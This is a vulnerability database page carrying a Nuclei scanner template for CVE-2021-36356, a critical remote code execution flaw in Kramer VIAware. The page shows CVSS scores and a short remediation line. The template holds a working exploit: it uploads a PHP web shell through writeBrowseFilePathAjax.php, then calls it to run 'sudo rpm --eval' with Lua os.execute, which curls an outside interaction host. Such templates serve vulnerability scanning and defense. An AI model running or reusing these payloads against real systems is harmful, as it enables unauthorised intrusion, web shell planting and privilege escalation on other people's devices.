Lucene search

ProjectDiscoveryNUCLEI:CVE-2021-36356

HistoryApr 30, 2022 - 10:22 a.m.

Kramer VIAware - Remote Code Execution

2022-04-3010:22:52

ProjectDiscovery

github.com

cve2021

viaware

kramer

edb

rce

ajaxpages

writebrowsefilepathajax

firmware

input validation

web interface

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.8

Confidence

High

EPSS

0.884

Percentile

98.8%

JSON

KRAMER VIAware through August 2021 allows remote attackers to execute arbitrary code because ajaxPages/writeBrowseFilePathAjax.php accepts arbitrary executable pathnames.

id: CVE-2021-36356

info:
  name: Kramer VIAware - Remote Code Execution
  author: gy741
  severity: critical
  description: KRAMER VIAware through August 2021 allows remote attackers to execute arbitrary code because ajaxPages/writeBrowseFilePathAjax.php accepts arbitrary executable pathnames.
  remediation: |
    Apply the latest firmware update provided by Kramer to fix the vulnerability and ensure proper input validation in the web interface.
  reference:
    - https://www.exploit-db.com/exploits/50856
    - https://nvd.nist.gov/vuln/detail/CVE-2021-36356
    - https://nvd.nist.gov/vuln/detail/CVE-2021-35064
    - https://write-up.github.io/kramerav/
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-36356
    cwe-id: CWE-434
    epss-score: 0.88569
    epss-percentile: 0.98691
    cpe: cpe:2.3:a:kramerav:viaware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: kramerav
    product: viaware
  tags: cve2021,cve,viaware,kramer,edb,rce,intrusive,kramerav
variables:
  useragent: "{{rand_base(6)}}"

http:
  - raw:
      - |
        POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        radioBtnVal=%3C%3Fphp%0A++++++++if%28isset%28%24_GET%5B%27cmd%27%5D%29%29%0A++++++++%7B%0A++++++++++++system%28%24_GET%5B%27cmd%27%5D%29%3B%0A++++++++%7D%3F%3E&associateFileName=%2Fvar%2Fwww%2Fhtml%2F{{randstr}}.php
      - |
        GET /{{randstr}}.php?cmd=sudo+rpm+--eval+'%25{lua%3aos.execute("curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'")}' HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - http

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: {{useragent}}"
# digest: 490a0046304402203413df64712ea57d59bb2d86cd166be712ba380a013aa681d9d63d4780d2183602202bedd4f167a7f6023c115a69a60cfff0438b53ca9fd9f88ce19efd966620b47f:922c64590222798bb761d5b6d8e72950